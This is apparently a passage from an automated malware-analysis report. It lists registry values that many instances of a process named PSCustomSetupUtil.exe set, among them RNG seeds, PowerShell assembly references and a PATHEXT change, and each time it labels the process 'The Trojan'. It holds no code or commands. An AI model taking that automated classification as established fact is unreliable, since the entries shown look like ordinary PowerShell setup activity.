[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B6 37 BB C1 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE CE 84 8A 4B 4E 79 06 01 42 DA C1 8C 5D 68 45"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "44 C8 29 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 19 B0 A2 BB EB BF E4 A2 79 5E 59 6F C7 3E 6C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "D0 21 40 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 50 62 BF 48 1D 64 06 81 5A F9 42 E8 ED D5 D0"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "3C 19 FA C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 1B 63 31 B1 E9 45 92 EA 34 4B D7 FF 9D 1F 61"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 42 49 A1 AC F5 97 AF D8 6C 2A B6 B6 83 FB C7"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 14 B1 BF AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 BB 4D 64 5E FF EE F0 D9 2F DD 88 AE 80 9C 44"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 A1 25 CB AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 1C 54 50 3A DC B2 53 F9 5F B5 A7 9F A6 BD 6B"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "D2 ED 52 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 86 8A C2 BE DF E7 6D AE 37 33 16 73 BA 6A 75"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1A 26 E3 BF AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:3856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 88 9F 29 F5 79 12 80 1B 61 63 9A 42 93 37 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C8 72 10 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 94 2B 0E C7 49 55 86 DA 21 BF FC 0C 8B D4 16"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "28 A7 4C C2 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:2244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 98 28 4B ED 76 73 C8 4C 3F 27 FB 96 4B 5A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 6E F0 B4 42 B2 00 1E 28 ED A9 9B A6 A9 43 A9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "FC FA DE C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 D5 BF DE 2B D1 CD 25 FC 14 EA 7A 0B 27 DE 27"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "6E 6A 70 C2 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 48 8A 6D DB 3C 3D D7 6F C2 0D E4 82 32 0E 1F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "2C BB 9A C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 BB 23 01 82 BB 18 A9 52 1E 01 FC 97 50 26 AD"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "38 40 04 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A A2 10 4F 26 AA 17 8C C0 05 44 A2 CB 8A 03 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "18 B1 76 CB AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 48 CC FF 48 FC 2E 11 1A 63 31 45 63 D8 42 CD"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 0C 6B C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A6 0A EC 9E A9 21 A5 CA 48 76 F7 C5 41 F2 7C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 FD A3 CB AB F3 D0 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 0E AF DF 7E E4 4F 40 EB 12 10 40 BD DB FF 77"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "42 BE 02 C2 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 48 43 BB 4D 22 9F 00 44 91 BB 71 1C 2E E1 3D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "DA 07 C8 C0 AB F3 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 53 0C 7F 00 97 51 F2 4E 8E ED 67 C5 49 74 A0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F2 14 57 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 6E 48 65 D3 1E CE 0A 46 9C 44 05 11 B7 0E 7D"

